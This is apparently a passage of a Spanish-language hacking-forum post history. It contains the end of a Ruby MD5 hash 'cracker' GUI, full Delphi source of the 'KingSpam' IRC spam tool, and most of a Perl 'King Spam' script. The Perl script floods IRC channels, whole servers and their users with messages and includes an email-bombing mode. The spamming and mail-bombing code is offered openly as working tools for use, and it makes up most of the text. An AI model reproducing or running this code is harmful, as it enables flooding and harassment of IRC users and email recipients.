  window['geometry'] = '300x300-20+10'

  # Caption for the hash entry.
  TkLabel.new(window) do
    background "black"
    foreground "green"
    text "     MD5 : "
    place('relx'=>"0.1",'rely'=>"0.1")
  end

  # Entry holding the hash; the "Crack It" handler reads it through the
  # `md5` local.
  md5 = TkEntry.new(window){
    background "black"
    foreground "green"
    width 25
    place('relx'=>0.3,'rely'=>0.1)
  }

  # Caption for the output area.
  TkLabel.new(window) do
    background "black"
    foreground "green"
    text "Console"
    place('relx'=>0.4,'rely'=>0.2)
  end

  # Text widget that receives every status and result line.
  console =TkText.new(window) do
    background "black"
    foreground "green"
    width 30
    height 10
    place('relx'=>0.1,'rely'=>0.3)
  end
  73.  
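  TkButton.new(window) do
    text "Crack It"
    background "black"
    foreground "green"
    width 17
    activebackground "green"
    highlightbackground  "green"
    # Click handler: post the entered hash to three online lookup services
    # and show each answer. The hash leaves the machine over plain HTTP, so
    # the services and anyone on the network path learn it.
    command proc{
      # Keep the entry text in its own local. Assigning it back to `md5`
      # would replace the TkEntry captured by this closure with a String,
      # and the next click would fail on String#value.
      digest = md5.value.to_s

      console.insert("end","[+] Cracking ...\n\n")

      code = tomar("http://md5online.net/index.php","pass="+digest+"&option=hash2text&send=Submit")
      if code=~/pass : <b>(.*?)<\/b>/
        password = $1
        console.insert("end","[+] md5online.net -> "+password+"\n"  )
      else
        console.insert("end","[-] md5online.net -> Not Found" + "\n" )
      end

      code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+digest)

      if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
        password = $1
        console.insert("end","[+] md5.my-addr.co -> "+password+"\n")
      else
        console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n")
      end

      code = tomar("http://md5decryption.com/index.php","hash="+digest+"&submit=Decrypt It!")

      if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
        password = $1
        console.insert("end","[+] md5decryption.com -> "+password+"\n")
      else
        console.insert("end","[-] md5decryption.com -> Not Found"+"\n")
      end

      console.insert("end","\n[+] Finished\n" )

    }
    place('relx'=>0.3,'rely'=>0.9)
  end

  Tk.mainloop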
  119.  
  120. #The End ?
  121.  

Una imagen :



Eso es todo.
6  Programación / Programación General / [Delphi] KingSpam 0.4 en: 22 Mayo 2015, 17:23
Un simple programa para hacer spam en canales IRC; también puede listar canales y usuarios.

Es algo inestable; les recomiendo la versión en Perl.

Una imagen :



Código
  1. // KingSpam 0.4
  2. // (C) Doddy Hackman 2015
  3.  
  4. unit spam;
  5.  
  6. interface
  7.  
  8. uses
  9.  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  10.  System.Classes, Vcl.Graphics,
  11.  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
  12.  Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent,
  13.  IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus,
  14.  ShellApi;
  15.  
  16. type
  17.  TForm1 = class(TForm)
  18.    PageControl1: TPageControl;
  19.    TabSheet1: TTabSheet;
  20.    GroupBox1: TGroupBox;
  21.    Label1: TLabel;
  22.    host: TEdit;
  23.    Label2: TLabel;
  24.    port: TEdit;
  25.    Label3: TLabel;
  26.    nombre: TEdit;
  27.    Label4: TLabel;
  28.    canal: TEdit;
  29.    Label5: TLabel;
  30.    spam: TEdit;
  31.    Button1: TButton;
  32.    Button2: TButton;
  33.    Button3: TButton;
  34.    TabSheet2: TTabSheet;
  35.    GroupBox2: TGroupBox;
  36.    GroupBox3: TGroupBox;
  37.    canales: TListBox;
  38.    users: TListBox;
  39.    TabSheet3: TTabSheet;
  40.    GroupBox4: TGroupBox;
  41.    GroupBox5: TGroupBox;
  42.    lista_canales: TListBox;
  43.    console1: TMemo;
  44.    Label6: TLabel;
  45.    canal_agregar: TEdit;
  46.    Button4: TButton;
  47.    Button5: TButton;
  48.    TabSheet5: TTabSheet;
  49.    GroupBox8: TGroupBox;
  50.    console2: TMemo;
  51.    IdIRC1: TIdIRC;
  52.    Button9: TButton;
  53.    StatusBar1: TStatusBar;
  54.    GroupBox6: TGroupBox;
  55.    canal_spam_usuarios: TEdit;
  56.    TabSheet4: TTabSheet;
  57.    GroupBox7: TGroupBox;
  58.    Image2: TImage;
  59.    Label7: TLabel;
  60.    PopupMenu1: TPopupMenu;
  61.    L1: TMenuItem;
  62.    R1: TMenuItem;
  63.    OpenDialog1: TOpenDialog;
  64.    file_spam: TListBox;
  65.    spam_usuarios: TTimer;
  66.    Button11: TButton;
  67.    Button6: TButton;
  68.    otrospamfile: TListBox;
  69.    Image3: TImage;
  70.    procedure Button2Click(Sender: TObject);
  71.    procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  72.      const AMessage: string);
  73.  
  74.    procedure Button3Click(Sender: TObject);
  75.    procedure Button4Click(Sender: TObject);
  76.    procedure Button5Click(Sender: TObject);
  77.  
  78.    procedure Button1Click(Sender: TObject);
  79.    procedure L1Click(Sender: TObject);
  80.    procedure R1Click(Sender: TObject);
  81.    procedure spam_usuariosTimer(Sender: TObject);
  82.    procedure Button11Click(Sender: TObject);
  83.    procedure Button6Click(Sender: TObject);
  84.    procedure FormCreate(Sender: TObject);
  85.  
  86.  private
  87.    { Private declarations }
  88.  public
  89.    { Public declarations }
  90.  end;
  91.  
  92. var
  93.  Form1: TForm1;
  94.  buscando_usuarios: string;
  95.  buscando_canales: string;
  96.  control_guardar_canales: string;
  97.  control_guardar_users: string;
  98.  
  99. implementation
  100.  
  101. {$R *.dfm}
  102. // Functions
  103.  
  // Append texto plus a line break to filename, creating the file when it
  // does not exist yet.
  procedure savefile(filename, texto: string);
  var
    ar: TextFile;

  begin

    AssignFile(ar, filename);
    // FileMode is a global setting; it is changed here and not restored.
    FileMode := fmOpenWrite;

    // Append needs an existing file, so a missing one is created instead.
    if FileExists(filename) then
      Append(ar)
    else
      Rewrite(ar);

    // NOTE(review): no try/finally here, so the file stays open if Write
    // raises. filename is used as given; callers decide what goes into it.
    Write(ar, texto + sLineBreak);
    CloseFile(ar);

  end;
  122.  
  // Stop handler: marks the run as finished, drops the IRC connection and
  // disables the spam_usuarios timer.
  procedure TForm1.Button11Click(Sender: TObject);
  begin
    StatusBar1.Panels[0].Text := '[+] Finished';
    StatusBar1.Update;
    IdIRC1.Disconnect;
    spam_usuarios.Enabled := false;
  end;
  130.  
  // Let the user pick a text file and copy its lines into the file_spam
  // list box; the chosen path is also shown in the spam edit field.
  procedure TForm1.Button1Click(Sender: TObject);
  var
    i: integer;
    contenido: TStringList;
    stream: TFileStream;
  begin

    file_spam.Clear;

    if OpenDialog1.Execute then
    begin

      spam.Text := OpenDialog1.filename;

      // NOTE(review): contenido and stream are created here and never freed
      // in this procedure, so the file handle is not released by it.
      contenido := TStringList.Create;
      stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
      contenido.LoadFromStream(stream);

      for i := 0 to contenido.Count - 1 do
      begin
        file_spam.Items.Add(contenido[i]);
      end;
    end;

  end;
  156.  
  // Connect to the server named in host.Text and send LIST to enumerate its
  // channels. The replies are not read here; IdIRC1Raw processes them.
  procedure TForm1.Button2Click(Sender: TObject);
  var
    seleccion: integer;
  begin

    canales.Items.Clear;

    // Global flags are plain strings; 'yes' means enabled.
    buscando_canales := 'yes';

    seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0);
    if seleccion = mrYes then
    begin
      control_guardar_canales := 'yes';
    end;

    StatusBar1.Panels[0].Text := '[+] Searching channels ...';
    StatusBar1.Update;

    // IdIRC1.Disconnect;

    // Nickname, user name and real name all come from the same field; no
    // server password is sent.
    IdIRC1.Nickname := nombre.Text;
    IdIRC1.AltNickname := nombre.Text + '123';
    IdIRC1.Username := nombre.Text;
    IdIRC1.RealName := nombre.Text;
    IdIRC1.Password := '';
    IdIRC1.host := host.Text;

    try
      begin
        IdIRC1.Connect;
        IdIRC1.Raw('LIST');
      end;
    except
      begin
        // Every exception in the block above is reported with this message.
        ShowMessage('Error connecting');
      end;
    end;

    // host.Text goes into the log file name as typed and the file is handed
    // to the shell's 'open' verb.
    // NOTE(review): a value containing path separators would resolve
    // outside logs/ - confirm whether the field should be restricted.
    if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then
    begin
      ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text +
        '_canales.txt'), nil, nil, SW_SHOWNORMAL);
    end;

  end;
  202.  
  // Connect to the server named in host.Text and join the channel in
  // canal.Text so its users can be listed. The replies are not read here.
  procedure TForm1.Button3Click(Sender: TObject);
  var
    seleccion: integer;
  begin

    users.Items.Clear;

    // Global flags are plain strings; 'yes' means enabled.
    buscando_usuarios := 'yes';

    seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0);
    if seleccion = mrYes then
    begin
      control_guardar_users := 'yes';
    end;

    StatusBar1.Panels[0].Text := '[+] Searching users ...';
    StatusBar1.Update;

    // IdIRC1.Disconnect;

    // Nickname, user name and real name all come from the same field; no
    // server password is sent.
    IdIRC1.Nickname := nombre.Text;
    IdIRC1.AltNickname := nombre.Text + '123';
    IdIRC1.Username := nombre.Text;
    IdIRC1.RealName := nombre.Text;
    IdIRC1.Password := '';
    IdIRC1.host := host.Text;

    try
      begin
        IdIRC1.Connect;
        IdIRC1.Join(canal.Text);
      end;
    except
      begin
        // Every exception in the block above is reported with this message.
        ShowMessage('Error connecting');
      end;
    end;

    // canal.Text goes into the log file name as typed and the file is
    // handed to the shell's 'open' verb.
    // NOTE(review): a value containing path separators would resolve
    // outside logs/ - confirm whether the field should be restricted.
    if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then
    begin
      ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text +
        '_usuarios.txt'), nil, nil, SW_SHOWNORMAL);
    end;

  end;
  248.  
  // Add the channel typed in canal_agregar to the lista_canales list box.
  // The text is added as typed, with no check for duplicates or format.
  procedure TForm1.Button4Click(Sender: TObject);
  begin
    lista_canales.Items.Add(canal_agregar.Text);
  end;
  253.  
  // For every channel in lista_canales: join, post one line taken from
  // file_spam, wait two seconds, leave, wait two seconds.
  //
  // Seen from the network side this is one nickname joining a channel,
  // sending a single message and parting within a few seconds, repeated
  // channel after channel - a pattern flood protection and join/part
  // monitoring can key on.
  procedure TForm1.Button5Click(Sender: TObject);
  var
    i: integer;
    canal_z: string;
  begin

    StatusBar1.Panels[0].Text := '[+] Spamming channel ...';
    StatusBar1.Update;

    console1.Clear;
    try
      begin
        // Nickname, user name and real name all come from the same field.
        IdIRC1.Nickname := nombre.Text;
        IdIRC1.AltNickname := nombre.Text + '123';
        IdIRC1.Username := nombre.Text;
        IdIRC1.RealName := nombre.Text;
        IdIRC1.Password := '';
        IdIRC1.host := host.Text;
        IdIRC1.Connect;

        for i := 0 to lista_canales.Count - 1 do
        begin
          canal_z := lista_canales.Items[i];
          IdIRC1.Join(canal_z);
          console1.Lines.Add('[+] Spam in channel : ' + canal_z);
          IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]);
          Sleep(2000);
          IdIRC1.Part(canal_z);
          Sleep(2000);
        end;
      end;
    except
      // Every exception in the block above, not only connection failures,
      // is reported with this message.
      ShowMessage('Error connecting');
    end;

    IdIRC1.Disconnect;

    StatusBar1.Panels[0].Text := '[+] Finished';
    StatusBar1.Update;

  end;
  295.  
  296. procedure TForm1.Button6Click(Sender: TObject);
  297. begin
  298.  StatusBar1.Panels[0].Text := '[+] Spamming users ...';
  299.  StatusBar1.Update;
  300.  
  301.  IdIRC1.Nickname := nombre.Text;
  302.  IdIRC1.AltNickname := nombre.Text + '123';
  303.  IdIRC1.Username := nombre.Text;
  304.  IdIRC1.RealName := nombre.Text;
  305.  IdIRC1.Password := '';
  306.  IdIRC1.host := host.Text;
  307.  
  308.  try
  309.    begin
  310.      IdIRC1.Connect;
  311.      IdIRC1.Join(canal_spam_usuarios.Text);
  312.      spam_usuarios.Interval := 10000;
  313.      spam_usuarios.Enabled := true;
  314.    end;
  315.  except
  316.    begin
  317.      ShowMessage('Error connecting');
  318.    end;
  319.  end;
  320. end;
  321.  
  322. procedure TForm1.FormCreate(Sender: TObject);
  323. begin
  324.  
  325.  if not DirectoryExists('logs') then
  326.  begin
  327.    CreateDir('logs');
  328.  end;
  329.  
  330.  OpenDialog1.InitialDir := GetCurrentDir;
  331.  
  332. end;
  333.  
  334. procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  335.  const AMessage: string);
  336. var
  337.  code: string;
  338.  regex: TPerlRegEx;
  339.  otroregex: TPerlRegEx;
  340.  canales_encontrados: string;
  341.  control: TPerlRegEx;
  342.  otrocontrol: TPerlRegEx;
  343.  i: integer;
  344.  i2: integer;
  345.  renicks: string;
  346.  listanow: TStringList;
  347.  arraynow: array of String;
  348.  
  349. begin
  350.  code := AMessage;
  351.  
  352.  regex := TPerlRegEx.Create();
  353.  otroregex := TPerlRegEx.Create();
  354.  
  355.  // console1.Lines.Add(code);
  356.  
  357.  regex.regex := '322 (.*?) (.*?) (.*?) :';
  358.  regex.Subject := code;
  359.  
  360.  if regex.Match then
  361.  begin
  362.    canales_encontrados := regex.Groups[2];
  363.    canales.Items.Add(canales_encontrados);
  364.    if (control_guardar_canales = 'yes') then
  365.    begin
  366.      savefile('logs/' + host.Text + '_canales.txt', canales_encontrados);
  367.    end;
  368.  end;
  369.  
  370.  otroregex.regex := '353 (.*) = #(.*) :(.*)';
  371.  otroregex.Subject := code;
  372.  
  373.  if otroregex.Match then
  374.  begin
  375.  
  376.    renicks := otroregex.Groups[3];
  377.  
  378.    renicks := StringReplace(renicks, nombre.Text, '', []);
  379.  
  380.    listanow := TStringList.Create;
  381.    listanow.Delimiter := ' ';
  382.    listanow.DelimitedText := renicks;
  383.  
  384.    for i2 := 0 to listanow.Count - 1 do
  385.    begin
  386.      users.Items.Add(listanow[i2]);
  387.      if (control_guardar_users = 'yes') then
  388.      begin
  389.        savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]);
  390.      end;
  391.    end;
  392.  end;
  393.  
  394.  control := TPerlRegEx.Create();
  395.  control.regex := 'End of /LIST';
  396.  control.Subject := code;
  397.  if control.Match then
  398.  begin
  399.    if (buscando_canales = 'yes') then
  400.    begin
  401.      ShowMessage('Channels Loaded');
  402.      StatusBar1.Panels[0].Text := '[+] Channels Found';
  403.      StatusBar1.Update;
  404.      regex.Free;
  405.      IdIRC1.Disconnect;
  406.      IdIRC1.Destroy;
  407.      buscando_canales := 'no';
  408.    end;
  409.  end;
  410.  
  411.  otrocontrol := TPerlRegEx.Create();
  412.  otrocontrol.regex := 'End of /NAMES';
  413.  otrocontrol.Subject := code;
  414.  if otrocontrol.Match then
  415.  begin
  416.    if (buscando_usuarios = 'yes') then
  417.    begin
  418.      ShowMessage('Users Loaded');
  419.      StatusBar1.Panels[0].Text := '[+] Users Found';
  420.      StatusBar1.Update;
  421.      otrocontrol.Free;
  422.      IdIRC1.Part(canal.Text);
  423.      IdIRC1.Disconnect;
  424.      IdIRC1.Destroy();
  425.      buscando_usuarios := 'no';
  426.    end;
  427.  end;
  428.  
  429. end;
  430.  
  431. procedure TForm1.L1Click(Sender: TObject);
  432. var
  433.  i: integer;
  434.  contenido: TStringList;
  435.  stream: TFileStream;
  436. begin
  437.  
  438.  if OpenDialog1.Execute then
  439.  begin
  440.    contenido := TStringList.Create;
  441.    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
  442.    contenido.LoadFromStream(stream);
  443.  
  444.    for i := 0 to contenido.Count - 1 do
  445.    begin
  446.      lista_canales.Items.Add(contenido[i]);
  447.    end;
  448.  end;
  449.  
  450. end;
  451.  
  452. procedure TForm1.R1Click(Sender: TObject);
  453. begin
  454.  lista_canales.Clear;
  455. end;
  456.  
  457. procedure TForm1.spam_usuariosTimer(Sender: TObject);
  458. var
  459.  i: integer;
  460. begin
  461.  
  462.  for i := 0 to users.Count - 1 do
  463.  begin
  464.  
  465.    StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i];
  466.    StatusBar1.Update;
  467.  
  468.    console2.Lines.Add('[+] Spamming to ' + users.Items[i]);
  469.  
  470.    IdIRC1.Say(users.Items[i],
  471.      file_spam.Items[Random(file_spam.Count - 1) + 0]);
  472.  
  473.  end;
  474.  
  475. end;
  476.  
  477. end.
  478.  
  479. // The End ?
  480.  

Si lo quieren bajar lo pueden hacer de aca
7  Programación / Scripting / [Perl] King Spam 1.0 en: 15 Mayo 2015, 18:25
Un simple script en Perl para hacer spam en canales IRC y correos.

Tiene las siguientes opciones :

  • Spammear un canal normalmente o por siempre
  • Spammear un servidor entero
  • Spammear una lista de servidores y todos sus canales
  • Poder elegir un nick para el bot y un timeout
  • Permite spammear cuentas de correo

El codigo :

Código
  1. #!usr/bin/perl
  2. #King Spam 1.0
  3. #(C) Doddy Hackman 2015
  4. # SMTP Servers
  5. #smtp.gmail.com - 465
  6. #smtp.mail.yahoo.com -587
  7.  
  8. use IO::Socket;
  9. use Color::Output;
  10. Color::Output::Init;
  11. use Getopt::Long;
  12.  
  13. #use Win32::OLE;
  14.  
  15. my $nick_secundario    = "Cl4ptr4p";
  16. my $timeout_secundario = "5";
  17.  
  18. GetOptions(
  19.    "get_channels=s"         => \$get_channels,
  20.    "get_users=s"            => \$get_users,
  21.    "spam_channel=s"         => \$spam_channel,
  22.    "spam_channel_forever=s" => \$spam_channel_forever,
  23.    "spam_server=s"          => \$spam_server,
  24.    "spam_servers_file=s"    => \$spam_servers_file,
  25.    "spam_targets=s"         => \$spam_targets,
  26.    "spam_file=s"            => \$spam_file,
  27.    "channel=s"              => \$channel,
  28.    "port=s"                 => \$port,
  29.    "nick=s"                 => \$nick,
  30.    "savefile=s"             => \$file,
  31.    "timeout=s"              => \$timeout,
  32.    "mailbomber"             => \$mailbomber
  33. );
  34.  
  35. head();
  36.  
  37. if ($get_channels) {
  38.  
  39.    my $port_now = "";
  40.    my $nick_now = "";
  41.    my $file_now = "";
  42.  
  43.    if ( !$port ) {
  44.        $port_now = "6667";
  45.    }
  46.    else {
  47.        $port_now = $port;
  48.    }
  49.  
  50.    if ( !$nick ) {
  51.        $nick_now = $nick_secundario;
  52.    }
  53.    else {
  54.        $nick_now = $nick;
  55.    }
  56.  
  57.    if ( !$file ) {
  58.        $file_now = "";
  59.    }
  60.    else {
  61.        $file_now = $file;
  62.    }
  63.  
  64.    listar_canales( $get_channels, $port_now, $nick_now, $file_now );
  65.  
  66. }
  67. elsif ($get_users) {
  68.  
  69.    my $port_now = "";
  70.    my $nick_now = "";
  71.    my $file_now = "";
  72.  
  73.    if ( !$port ) {
  74.        $port_now = "6667";
  75.    }
  76.    else {
  77.        $port_now = $port;
  78.    }
  79.  
  80.    if ( !$nick ) {
  81.        $nick_now = $nick_secundario;
  82.    }
  83.    else {
  84.        $nick_now = $nick;
  85.    }
  86.  
  87.    printear_titulo("[+] Serching users ...\n\n");
  88.  
  89.    my @usuarios =
  90.      buscar_usuarios( $get_users, $port_now, $nick_now, $channel );
  91.  
  92.    if ( int(@usuarios) eq "0" ) {
  93.        printear("[-] Users not found\n");
  94.    }
  95.    else {
  96.        printear("[+] Users Found : ");
  97.        print int(@usuarios) . "\n\n";
  98.        for my $usuario (@usuarios) {
  99.            printear("[+] User : ");
  100.            print $usuario. "\n";
  101.            savefile( $file, $usuario );
  102.        }
  103.    }
  104.  
  105. }
  106. elsif ($spam_channel) {
  107.  
  108.    my $port_now    = "";
  109.    my $nick_now    = "";
  110.    my $timeout_now = "";
  111.  
  112.    if ( !$port ) {
  113.        $port_now = "6667";
  114.    }
  115.    else {
  116.        $port_now = $port;
  117.    }
  118.  
  119.    if ( !$nick ) {
  120.        $nick_now = $nick_secundario;
  121.    }
  122.    else {
  123.        $nick_now = $nick;
  124.    }
  125.  
  126.    if ( !$timeout ) {
  127.        $timeout_now = $timeout_secundario;
  128.    }
  129.    else {
  130.        $timeout_now = $timeout;
  131.    }
  132.  
  133.    spam_canal(
  134.        $spam_channel, $port_now,  $nick_now,
  135.        $channel,      $spam_file, $timeout_now
  136.    );
  137.  
  138. }
  139. elsif ($spam_channel_forever) {
  140.  
  141.    my $port_now    = "";
  142.    my $nick_now    = "";
  143.    my $timeout_now = "";
  144.  
  145.    if ( !$port ) {
  146.        $port_now = "6667";
  147.    }
  148.    else {
  149.        $port_now = $port;
  150.    }
  151.  
  152.    if ( !$nick ) {
  153.        $nick_now = $nick_secundario;
  154.    }
  155.    else {
  156.        $nick_now = $nick;
  157.    }
  158.  
  159.    if ( !$timeout ) {
  160.        $timeout_now = $timeout_secundario;
  161.    }
  162.    else {
  163.        $timeout_now = $timeout;
  164.    }
  165.  
  166.    spam_canal_forever( $spam_channel_forever, $port_now, $nick_now,
  167.        $channel, $spam_file, $timeout_now );
  168.  
  169. }
  170. elsif ($spam_server) {
  171.  
  172.    my $port_now    = "";
  173.    my $nick_now    = "";
  174.    my $timeout_now = "";
  175.  
  176.    if ( !$port ) {
  177.        $port_now = "6667";
  178.    }
  179.    else {
  180.        $port_now = $port;
  181.    }
  182.  
  183.    if ( !$nick ) {
  184.        $nick_now = $nick_secundario;
  185.    }
  186.    else {
  187.        $nick_now = $nick;
  188.    }
  189.  
  190.    if ( !$timeout ) {
  191.        $timeout_now = $timeout_secundario;
  192.    }
  193.    else {
  194.        $timeout_now = $timeout;
  195.    }
  196.  
  197.    my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now );
  198.  
  199.    for my $encontrado (@encontrados) {
  200.        if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  201.            my $canal    = $1;
  202.            my $cantidad = $2;
  203.  
  204.            spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file,
  205.                $timeout_now );
  206.  
  207.        }
  208.    }
  209.  
  210. }
  211. elsif ($spam_servers_file) {
  212.  
  213.    my $port_now    = "";
  214.    my $nick_now    = "";
  215.    my $timeout_now = "";
  216.  
  217.    if ( !$port ) {
  218.        $port_now = "6667";
  219.    }
  220.    else {
  221.        $port_now = $port;
  222.    }
  223.  
  224.    if ( !$nick ) {
  225.        $nick_now = $nick_secundario;
  226.    }
  227.    else {
  228.        $nick_now = $nick;
  229.    }
  230.  
  231.    if ( !$timeout ) {
  232.        $timeout_now = $timeout_secundario;
  233.    }
  234.    else {
  235.        $timeout_now = $timeout;
  236.    }
  237.  
  238.    unless ( -f $spam_servers_file ) {
  239.        printear("[-] File not found\n\n");
  240.        copyright();
  241.    }
  242.    else {
  243.  
  244.        my @lista = loadfile($spam_servers_file);
  245.  
  246.        printear("[+] Servers Found : ");
  247.        print int(@lista) . "\n";
  248.  
  249.        printear_titulo(
  250.            "\n-------------------------------------------------------------\n"
  251.        );
  252.  
  253.        for my $spam_server (@lista) {
  254.            chomp $spam_server;
  255.            my @encontrados =
  256.              buscar_canales( $spam_server, $port_now, $nick_now );
  257.  
  258.            for my $encontrado (@encontrados) {
  259.                chomp $encontrado;
  260.                if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  261.                    my $canal    = $1;
  262.                    my $cantidad = $2;
  263.  
  264.                    spam_canal( $spam_server, $port_now, $nick_now, $canal,
  265.                        $spam_file, $timeout_now );
  266.                    printear_titulo(
  267. "\n-------------------------------------------------------------\n"
  268.                    );
  269.                }
  270.            }
  271.        }
  272.    }
  273.  
  274. }
  275. elsif ($spam_targets) {
  276.  
  277.    my $port_now    = "";
  278.    my $nick_now    = "";
  279.    my $timeout_now = "";
  280.  
  281.    if ( !$port ) {
  282.        $port_now = "6667";
  283.    }
  284.    else {
  285.        $port_now = $port;
  286.    }
  287.  
  288.    if ( !$nick ) {
  289.        $nick_now = $nick_secundario;
  290.    }
  291.    else {
  292.        $nick_now = $nick;
  293.    }
  294.  
  295.    if ( !$timeout ) {
  296.        $timeout_now = $timeout_secundario;
  297.    }
  298.    else {
  299.        $timeout_now = $timeout;
  300.    }
  301.  
  302.    if ( -f $spam_targets ) {
  303.  
  304.        my @datos = loadfile($spam_targets);
  305.  
  306.        printear("[+] Servers Found : ");
  307.        print int(@datos) . "\n";
  308.  
  309.        printear_titulo(
  310.            "\n-------------------------------------------------------------\n"
  311.        );
  312.  
  313.        for my $dato (@datos) {
  314.            chomp $dato;
  315.            if ( $dato =~ /(.*) --- (.*)/ ) {
  316.                my $server = $1;
  317.                my $canal  = $2;
  318.  
  319.                spam_canal( $server, $port_now, $nick_now, $canal, $spam_file,
  320.                    $timeout_now );
  321.                printear_titulo(
  322. "\n-------------------------------------------------------------\n"
  323.                );
  324.  
  325.            }
  326.        }
  327.  
  328.    }
  329.    else {
  330.        printear("\n[-] File not Found\n\n");
  331.        copyright();
  332.    }
  333.  
  334. }
  335. elsif ($mailbomber) {
  336.  
  337.    printear_titulo("[+] Spam Mails : OK\n\n\n");
  338.  
  339.    printear("[+] Host : ");
  340.    chomp( my $host = <stdin> );
  341.  
  342.    printear("\n[+] Port : ");
  343.    chomp( my $puerto = <stdin> );
  344.  
  345.    printear("\n[+] Username : ");
  346.    chomp( my $username = <stdin> );
  347.  
  348.    printear("\n[+] Password : ");
  349.    chomp( my $password = <stdin> );
  350.  
  351.    printear("\n[+] Count Message : ");
  352.    chomp( my $count = <stdin> );
  353.  
  354.    printear("\n[+] To : ");
  355.    chomp( my $to = <stdin> );
  356.  
  357.    printear("\n[+] Subject : ");
  358.    chomp( my $asunto = <stdin> );
  359.  
  360.    printear("\n[+] Body : ");
  361.    chomp( my $body = <stdin> );
  362.  
  363.    printear("\n[+] File to Send : ");
  364.    chomp( my $file = <stdin> );
  365.  
  366.    printear_titulo("\n[+] Starting ...\n\n");
  367.  
  368.    for my $num ( 1 .. $count ) {
  369.        printear("[+] Sending Message : ");
  370.        print "$num\n";
  371.        sendmail(
  372.            $host,     $puerto, $username, $password, $username, $username,
  373.            $username, $to,     $asunto,   $body,     $file
  374.        );
  375.    }
  376.  
  377.    printear_titulo("\n[+] Finished\n");
  378.  
  379. }
  380. else {
  381.    sintax();
  382. }
  383.  
  384. copyright();
  385.  
  386. # Functions
  387.  
  388. sub spam_canal {
  389.  
  390.    my $hostname = $_[0];
  391.    my $port     = $_[1];
  392.    my $nombre   = $_[2];
  393.    my $canal    = $_[3];
  394.    my $archivo  = $_[4];
  395.  
  396.    printear("[+] Connecting to ");
  397.    print $hostname. "\n\n";
  398.  
  399.    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
  400.    my $contador = 0;
  401.    my $termine  = 0;
  402.    my $timeout  = $_[5];
  403.  
  404.    my @spamnow = loadfile($archivo);
  405.  
  406.    if (
  407.        my $socket = new IO::Socket::INET(
  408.            PeerAddr => $hostname,
  409.            PeerPort => $port,
  410.            Proto    => "tcp"
  411.        )
  412.      )
  413.    {
  414.  
  415.        print $socket "NICK $nombre\r\n";
  416.        print $socket "USER $nombre 1 1 1 1\r\n";
  417.        print $socket "JOIN $canal\r\n";
  418.  
  419.        printear_titulo("[+] Users Found : ");
  420.        print int(@nicks) . "\n\n";
  421.  
  422.        while ( my $log = <$socket> ) {
  423.            chomp $log;
  424.  
  425.            if ( $log =~ /^PING(.*)$/i ) {
  426.                print $socket "PONG $1\r\n";
  427.            }
  428.  
  429.            if ( $contador eq "0" ) {
  430.                printear("[+] Spam in channel : ");
  431.                print $canal. "\n";
  432.                sleep($timeout);
  433.                print $socket "PRIVMSG $canal "
  434.                  . $spamnow[ rand(@spamnow) ] . "\r\n";
  435.                $contador++;
  436.            }
  437.  
  438.            foreach $names (@nicks) {
  439.                chomp $names;
  440.                sleep($timeout);
  441.                unless ( $nombre eq $names ) {
  442.                    $names =~ s/\@//;
  443.                    $names =~ s/\+//;
  444.                    print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
  445.                    printear("[+] Spam to user $names : ");
  446.                    print "OK\n";
  447.                }
  448.                $termine++;
  449.            }
  450.  
  451.            if ( $termine eq int(@nicks) ) {
  452.                $socket->close();
  453.                last;
  454.            }
  455.  
  456.        }
  457.    }
  458.    else {
  459.        printear("[-] Error\n");
  460.        $socket->close();
  461.    }
  462.  
  463. }
  464.  
  465. sub spam_canal_forever {
  466.  
  467.    my $hostname = $_[0];
  468.    my $port     = $_[1];
  469.    my $nombre   = $_[2];
  470.    my $canal    = $_[3];
  471.    my $archivo  = $_[4];
  472.  
  473.    printear("[+] Connecting to ");
  474.    print $hostname. "\n\n";
  475.  
  476.    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
  477.    my $contador = 0;
  478.    my $termine  = 0;
  479.    my $timeout  = $_[5];
  480.  
  481.    my @spamnow = loadfile($archivo);
  482.  
  483.    if (
  484.        my $socket = new IO::Socket::INET(
  485.            PeerAddr => $hostname,
  486.            PeerPort => $port,
  487.            Proto    => "tcp"
  488.        )
  489.      )
  490.    {
  491.  
  492.        print $socket "NICK $nombre\r\n";
  493.        print $socket "USER $nombre 1 1 1 1\r\n";
  494.        print $socket "JOIN $canal\r\n";
  495.  
  496.        printear_titulo("[+] Users Found : ");
  497.        print int(@nicks) . "\n\n";
  498.  
  499.        while ( my $log = <$socket> ) {
  500.            chomp $log;
  501.  
  502.            while (1) {
  503.                if ( $log =~ /^PING(.*)$/i ) {
  504.                    print $socket "PONG $1\r\n";
  505.                }
  506.  
  507.                if ( $contador eq "0" ) {
  508.                    printear("[+] Spam in channel : ");
  509.                    print $canal. "\n";
  510.                    sleep($timeout);
  511.                    print $socket "PRIVMSG $canal "
